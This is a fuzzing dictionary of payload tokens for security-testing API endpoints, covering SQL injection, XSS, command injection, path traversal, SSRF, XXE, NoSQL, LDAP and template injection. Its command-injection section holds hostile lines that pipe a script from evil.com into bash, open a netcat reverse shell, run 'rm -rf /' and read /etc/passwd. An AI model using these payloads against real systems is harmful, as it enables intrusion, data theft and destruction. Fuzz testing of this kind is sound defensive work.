# API Fuzzer Dictionary
# Tokens for fuzzing API endpoints - SQL injection, XSS, command injection, etc.

# SQL Injection
"' OR '1'='1"
"' OR 1=1--"
"' OR 'x'='x"
"admin'--"
"1' UNION SELECT NULL--"
"1' UNION SELECT NULL,NULL--"
"' UNION SELECT username,password FROM users--"
"'; DROP TABLE users--"
"' AND 1=0 UNION ALL SELECT 'admin', 'password"
"1' AND '1'='1"
"' OR 'a'='a"
" OR 1=1"
" OR '1'='1"
"1' ORDER BY 1--"
"1' ORDER BY 2--"
"1' ORDER BY 10--"
"' UNION SELECT NULL, table_name FROM information_schema.tables--"
"' AND (SELECT COUNT(*) FROM users) > 0--"
"' WAITFOR DELAY '00:00:05'--"
"'; EXEC xp_cmdshell('whoami')--"
"' AND SLEEP(5)--"
"' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--"

# XSS
"<script>alert('XSS')</script>"
"<img src=x onerror=alert('XSS')>"
"<svg onload=alert('XSS')>"
"<iframe src=javascript:alert('XSS')>"
"<body onload=alert('XSS')>"
"<input onfocus=alert('XSS') autofocus>"
"<select onfocus=alert('XSS') autofocus>"
"<textarea onfocus=alert('XSS') autofocus>"
"<keygen onfocus=alert('XSS') autofocus>"
"<video><source onerror=alert('XSS')>"
"<audio src=x onerror=alert('XSS')>"
"<details open ontoggle=alert('XSS')>"
"<marquee onstart=alert('XSS')>"
"javascript:alert('XSS')"
"';alert(String.fromCharCode(88,83,83))//'"
"\"><script>alert(String.fromCharCode(88,83,83))</script>"
"<IMG SRC=\"javascript:alert('XSS');\">"
"<IMG SRC=JaVaScRiPt:alert('XSS')>"
"<IMG SRC=`javascript:alert('XSS')`>"
"<ScRiPt>alert('XSS')</sCrIpT>"

# Command Injection
"; ls -la"
"| ls -la"
"& ls -la"
"&& ls -la"
"; cat /etc/passwd"
"| cat /etc/passwd"
"; whoami"
"| whoami"
"`whoami`"
"$(whoami)"
"; rm -rf /"
"| rm -rf /"
"; wget http://evil.com/shell.sh"
"; curl http://evil.com/shell.sh | bash"
"|| ls -la"
"&& cat /etc/passwd"
"`cat /etc/passwd`"
"$(cat /etc/passwd)"
"; nc -e /bin/sh attacker 4444"
"| python -c 'import socket,subprocess,os;...'"

# Path Traversal
"../"
"../../"
"../../../"
"../../../../"
"../../../../../"
"../../../../../../etc/passwd"
"../../../etc/passwd"
"....//....//....//etc/passwd"
"..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts"
"/etc/passwd"
"/etc/shadow"
"/proc/self/environ"
"%2e%2e%2f"
"%2e%2e/"
"..%2f"
"%2e%2e%5c"

# SSRF
"http://localhost"
"http://127.0.0.1"
"http://0.0.0.0"
"http://169.254.169.254"
"http://169.254.169.254/latest/meta-data/"
"http://[::1]"
"http://127.0.0.1:80"
"http://127.0.0.1:22"
"http://127.0.0.1:3306"
"http://127.0.0.1:6379"
"file:///etc/passwd"
"file:///c:/windows/win.ini"
"dict://localhost:11211/"
"gopher://localhost:6379/_"

# Authentication/Authorization Bypass
"admin"
"administrator"
"root"
"null"
"undefined"
"true"
"false"
"0"
"-1"
"9999999"
"' or 1=1 limit 1--"

# JWT Manipulation
"none"
"HS256"
"RS256"
"eyJhbGciOiJub25lIn0"
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"

# NoSQL Injection
"[$ne]"
"[$gt]"
"[$lt]"
"[$regex]"
"[$where]"
"'; return true; var dummy='"
"' || 1==1"
"{\"$gt\":\"\"}"
"{\"$ne\":null}"

# LDAP Injection
"*"
"*)(&"
"*)(|(objectClass=*"
"admin*"
"*()|&'"

# XML/XXE
"<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
"<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://evil.com/\">]>"
"<![CDATA[<script>alert('XSS')</script>]]>"

# Template Injection
"{{"
"}}"
"{{7*7}}"
"{{config}}"
"${7*7}"
"<%= 7*7 %>"
"#{7*7}"
"*{7*7}"

# Special Characters
"\x00"
"\n"
"\r"
"\t"
"\x1f"
"%00"
"%0a"
"%0d"
"'"
"\""
"`"
";"
"|"
"&"
"$"
"("
")"
"{"
"}"
"["
"]"
"<"
">"
"*"
"?"
"~"
"!"
"@"
"#"
"%"
"^"
"="
"+"
"\\"

# Unicode and Encoding
"ʼ"
"′"
"'"
"ˈ"
"%u0027"
"%u0022"
"\u0027"
"\u0022"
"&#39;"
"&#34;"
"&#x27;"
"&#x22;"

# HTTP Methods
"GET"
"POST"
"PUT"
"DELETE"
"PATCH"
"OPTIONS"
"HEAD"
"TRACE"
"CONNECT"

# Content-Type variations
"application/json"
"application/x-www-form-urlencoded"
"multipart/form-data"
"text/plain"
"text/html"
"application/xml"

# Common API parameters
"id"
"user_id"
"username"
"password"
"email"
"token"
"api_key"
"file"
"filename"
"path"
"url"
"callback"
"redirect"
"next"
"return_url"
"method"
"key"
"secret"
"intended_for"
"position"
"documentid"
"login"

# Error-inducing values
""
" "
"null"
"NULL"
"Null"
"None"
"undefined"
"NaN"
"Infinity"
"-Infinity"
"[]"
"{}"
"[object Object]"
"[object Null]"
